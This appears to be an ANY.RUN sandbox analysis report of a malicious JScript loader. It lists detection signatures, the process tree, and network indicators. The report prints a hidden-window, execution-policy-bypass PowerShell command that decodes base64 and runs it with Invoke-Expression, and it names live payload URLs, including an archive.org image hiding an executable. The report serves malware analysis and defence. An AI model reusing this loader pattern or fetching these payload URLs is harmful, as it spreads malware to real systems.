File name: _9e723c8e69f2f47abffed153064f415caf47528ed269b56725c0cd26326a2f32.txt

Full analysis: https://app.any.run/tasks/26e49ba0-ea4a-459f-b964-9050026337cd
Verdict: Malicious activity
Analysis date: August 14, 2025, 15:16:30
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags: susp-powershell, payload
Indicators:
MIME: text/plain
File info: Unicode text, UTF-8 text, with very long lines (1350), with CRLF line terminators
MD5: 73EC60B26018346B613F2296EFD0E239
SHA1: D094DFE8BD5E7840B7FF9D6943D42A356B3ADA1B
SHA256: 9E723C8E69F2F47ABFFED153064F415CAF47528ED269B56725C0CD26326A2F32
SSDEEP: 768:e0+C50EULYyskCd+I4Jv5Y+eBjTrPg1+6pagSk+9jnsVi1d3Yeg+Jp1re4JaSk+X:e0+C50EULYyskCd+I4Jv5Y+eBjTrPg1U

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • May hide the program window using WMI (SCRIPT)

      • wscript.exe (PID: 2964)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 6820)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6820)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 6820)
  • SUSPICIOUS

    • Creates an object to access WMI (SCRIPT)

      • wscript.exe (PID: 2964)
    • Uses WMI to retrieve WMI-managed resources (SCRIPT)

      • wscript.exe (PID: 2964)
    • Executed via WMI

      • powershell.exe (PID: 6820)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 6820)
  • INFO

    • Disables trace logs

      • powershell.exe (PID: 6820)
    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 6820)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 6820)
    • Checks proxy server information

      • powershell.exe (PID: 6820)
      • slui.exe (PID: 6840)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6820)
    • Found Base64 encoded network access via PowerShell (YARA)

      • powershell.exe (PID: 6820)
    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • powershell.exe (PID: 6820)
    • Found Base64 encoded text manipulation via PowerShell (YARA)

      • powershell.exe (PID: 6820)
    • Reads the software policy settings

      • slui.exe (PID: 6840)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes: 136
Monitored processes: 4
Malicious processes: 2
Suspicious processes: 0

Behavior graph

Process nodes shown in the graph: wscript.exe (no specs), powershell.exe, conhost.exe (no specs), slui.exe. The interactive graph with per-process details is available in the full report.

Process information

PID: 2964
CMD: "C:\Windows\System32\WScript.exe" C:\Users\admin\Desktop\_9e723c8e69f2f47abffed153064f415caf47528ed269b56725c0cd26326a2f32.txt.js
Path: C:\Windows\System32\wscript.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 2972
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 6820
CMD: powershell -w hidden -noprofile -ep bypass -c "$annointing='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';$translatively=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($annointing));Invoke-Expression $translatively"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 6840
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
Total events: 8 546
Read events: 8 545
Write events: 1
Delete events: 0

Modification events

(PID) Process: (2964) wscript.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
Operation: write
Name: JScriptSetScriptStateStarted
Value: FCD7180000000000
Executable files: 0
Suspicious files: 1
Text files: 2
Unknown types: 0

Dropped files

PID: 6820
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_dk1xszvd.caq.ps1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 6820
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_szqc5iav.clh.psm1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 6820
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Type: binary
MD5: 1390FF9EDDD15A4271D0B917CFE9C51D
SHA256: E781798CD9695BABC51958B9DCBB1102EB6032D171DDA27729015DF07326B84C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 12
TCP/UDP connections: 25
DNS requests: 11
Threats: 12

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
5944 | MoUsoCoreWorker.exe | GET | 200 | 23.216.77.16:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | DE | binary | 825 b | whitelisted
1268 | svchost.exe | GET | 200 | 23.216.77.16:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | DE | binary | 825 b | whitelisted
5968 | RUXIMICS.exe | GET | 200 | 23.216.77.16:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | DE | binary | 825 b | whitelisted
1268 | svchost.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | NL | binary | 814 b | whitelisted
 | | GET | 200 | 51.77.231.201:443 | https://suspended-domain.net/a/index.html | FR | html | 56.7 Kb | unknown
6820 | powershell.exe | GET | 302 | 185.27.134.212:80 | http://macino21.gt.tc/arquivo_ca10932dba0e4e299767fa860cb73770.txt | GB | html | 242 b | malicious
 | | GET | 302 | 207.241.224.2:443 | https://archive.org/download/msi-pro/MSI_PRO.jpg | US | | | unknown
5968 | RUXIMICS.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | NL | binary | 814 b | whitelisted
 | | GET | 200 | 204.62.247.40:443 | https://dn721700.ca.archive.org/0/items/msi-pro/MSI_PRO.jpg | US | binary | 7.69 Mb | whitelisted
 | | POST | 500 | 4.255.142.105:443 | https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail | US | xml | 512 b | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
1268 | svchost.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
4 | System | 192.168.100.255:137 | | | | whitelisted
5944 | MoUsoCoreWorker.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
5968 | RUXIMICS.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
4 | System | 192.168.100.255:138 | | | | whitelisted
1268 | svchost.exe | 23.216.77.16:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
5944 | MoUsoCoreWorker.exe | 23.216.77.16:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
5968 | RUXIMICS.exe | 23.216.77.16:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
1268 | svchost.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted
5968 | RUXIMICS.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
  • 51.104.136.2
whitelisted
google.com
  • 142.250.185.78
whitelisted
crl.microsoft.com
  • 23.216.77.16
  • 23.216.77.25
  • 23.216.77.15
  • 23.216.77.18
  • 23.216.77.20
  • 23.216.77.22
  • 23.216.77.21
  • 23.216.77.19
  • 23.216.77.13
whitelisted
www.microsoft.com
  • 95.101.149.131
whitelisted
archive.org
  • 207.241.224.2
whitelisted
dn721700.ca.archive.org
  • 204.62.247.40
whitelisted
macino21.gt.tc
  • 185.27.134.212
unknown
suspended-domain.net
  • 51.77.231.201
unknown
self.events.data.microsoft.com
  • 104.208.16.88
whitelisted
activation-v2.sls.microsoft.com
  • 4.255.142.105
whitelisted

Threats

PID | Process | Class | Message
 | | Unknown Traffic | ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW)
 | | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage
 | | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage
 | | A Network Trojan was detected | ET MALWARE Request To Image Hosted on Archive .org With PowerShell User-Agent (Likely Stenography Payload)
 | | A Network Trojan was detected | ET MALWARE Request To Image Hosted on Archive .org With PowerShell User-Agent (Likely Stenography Payload)
 | | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage
 | | A Network Trojan was detected | ET MALWARE Request To Image Hosted on Archive .org With PowerShell User-Agent (Likely Stenography Payload)
 | | A Network Trojan was detected | PAYLOAD [ANY.RUN] Base64 encoded PE EXE file inside JPEG image
 | | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage
 | | A Network Trojan was detected | ET MALWARE Request To Image Hosted on Archive .org With PowerShell User-Agent (Likely Stenography Payload)
No debug info